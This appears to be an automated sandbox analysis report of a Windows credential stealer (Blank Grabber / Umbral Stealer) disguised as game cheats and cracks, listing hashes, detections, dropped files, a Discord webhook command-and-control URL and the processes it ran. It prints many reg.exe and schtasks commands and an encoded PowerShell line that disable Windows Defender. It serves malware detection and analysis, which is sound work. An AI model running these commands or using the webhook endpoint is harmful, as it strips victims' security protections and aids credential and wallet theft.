Windows Analysis Report
wKj1CBkbos.exe

Overview

General Information

Sample name: wKj1CBkbos.exe
(renamed because the original name is a hash value)
Original sample name: E3A480A53D8B2C398A7642E1F4E84785.exe
Analysis ID: 1545326
MD5: e3a480a53d8b2c398a7642e1f4e84785
SHA1: 7f8fa5e3dc9be9055f9202213be33460a1af1e09
SHA256: 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2
Tags: DCRat, exe, user-abuse_ch

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates files with lurking names (e.g. Crack.exe)
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Sigma detected: Disable Important Scheduled Task
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by executing a special instruction (VM detection)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: wKj1CBkbos.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: wKj1CBkbos.exe Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe ReversingLabs: Detection: 92%
Source: wKj1CBkbos.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Joe Sandbox ML: detected
Source: wKj1CBkbos.exe Joe Sandbox ML: detected
Source: wKj1CBkbos.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Networking

Source: Malware configuration extractor URLs: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1
Source: Joe Sandbox View ASN Name: TUT-ASUS
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: 52cheatand52rat.exe, 00000002.00000002.2218560821.000001BC1CA1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gstatic.com
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04409000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC0437E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 52cheatand52rat.exe.0.dr String found in binary or memory: https://discord.com/api/v10/users/
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr String found in binary or memory: https://discordapp.com/api/v9/users/
Source: 52cheatand52rat.exe.0.dr String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gstatic.com
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gstatic.com/generate_204
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: reg.exe Process created: 67

System Summary

Source: wKj1CBkbos.exe, type: SAMPLE Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe
Source: Lunch LaCheat.exe.6.dr Static PE information: .vmp0 and .vmp1 section names
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe 10D28E18A7DF4B2C30E05E5E361F1724E0B6EA8C021D8105EE30354BE79B98D1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe AFE91FEA04D39DE5710AD065252D13B9DF7B7BD25788DDF5AFB162A2F0A03296
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe 2952FA4AB9BC3E2B04B1F3AB6B648D0D23FA74856C50BF21FB13FDDFE9A874BB
Source: wKj1CBkbos.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: wKj1CBkbos.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Primordial Crack.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: wKj1CBkbos.exe, 00000000.00000002.2187239818.000000000141E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2143205509.000000000141E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.0000000001432000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2143205509.00000000013E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: wKj1CBkbos.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 52cheatand52rat.exe.0.dr, --------.cs Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: 52cheatand52rat.exe.0.dr, --------.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 52cheatand52rat.exe.0.dr, --------.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@113/6@1/1
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Mutant created: \Sessions\1\BaseNamedObjects\kwtxO2R822Z9ihsGdQrR
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: wKj1CBkbos.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: wKj1CBkbos.exe ReversingLabs: Detection: 95%
Source: unknown Process created: C:\Users\user\Desktop\wKj1CBkbos.exe "C:\Users\user\Desktop\wKj1CBkbos.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe"
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
